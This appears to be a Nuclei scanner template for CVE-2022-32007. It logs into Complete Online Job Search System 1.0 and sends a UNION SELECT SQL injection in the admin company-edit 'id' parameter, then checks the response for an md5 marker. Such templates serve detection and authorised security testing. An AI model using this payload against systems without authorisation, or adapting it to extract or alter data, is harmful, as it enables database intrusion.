nuclei-templates/http/cves/2022/CVE-2022-32007.yaml

51 lines
2.2 KiB
YAML

id: CVE-2022-32007
info:
name: Complete Online Job Search System 1.0 - SQL Injection
author: arafatansari
severity: high
description: |
Complete Online Job Search System 1.0 contains a SQL injection vulnerability via /eris/admin/company/index.php?view=edit&id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database or modify its contents.
remediation: |
Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Complete Online Job Search System 1.0.
reference:
- https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/online-job-search-system/SQLi-2.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-32007
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2022-32007
cwe-id: CWE-89
epss-score: 0.01429
epss-percentile: 0.85199
cpe: cpe:2.3:a:complete_online_job_search_system_project:complete_online_job_search_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: complete_online_job_search_system_project
product: complete_online_job_search_system
tags: cve,cve2022,sqli,eris,authenticated,complete_online_job_search_system_project
variables:
num: "999999999"
http:
- raw:
- |
POST /admin/login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user_email={{username}}&user_pass={{password}}&btnLogin=
- |
GET /admin/company/index.php?view=edit&id=-3%27%20union%20select%201,md5({{num}}),3,4,5,6--+ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- '{{md5({{num}})}}'
# digest: 4b0a004830460221008ad23239cd7dd2a9bf0d16fa365774f1eed66f8132c22cd8754914207b1bfa6b022100a67736c94d6df0e5a51bf0750a3aa7dce46543398696dde083bb55fdffba091f:922c64590222798bb761d5b6d8e72950